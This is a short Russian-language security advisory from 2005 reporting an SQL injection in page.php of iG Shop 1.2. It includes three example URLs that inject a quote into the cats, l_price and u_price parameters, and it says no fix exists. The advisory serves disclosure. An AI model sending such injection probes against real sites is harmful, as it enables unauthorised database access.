Security Lab

SQL-инъекция в сценарии page.php в iG Shop

Дата публикации:24.02.2005
Всего просмотров:1157
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: iG Shop 1.2

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения.

Уязвимость существует в сценарии page.php из-за некорректной фильтрации входных данных в нескольких переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды. Примеры:

http://[target]/page.php?page_type=catalog_product s&type_id[]=2
& SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c &page_type=catalog_products&cats='

http://[target]/page.php?page_type=catalog_products&type_id[]=2
& SESSION _ID=304ba47f3ea48f0d6e1acdd6480c2c9c &page_type3=catalog_products&search
=1&l_price='&u_price=1&Submit=Search

http://[target]/page.php?page_type=catalog_products&type_ id[]=2
& SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c &page_type3=catalog_products&search
=1&l_price=1&u_price='&Submit=Search

URL производителя: http://www.igeneric.co.uk/display_resources/resource1.html

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: iG Shop Input Validation Bugs Let Remote Users Execute SQL Commands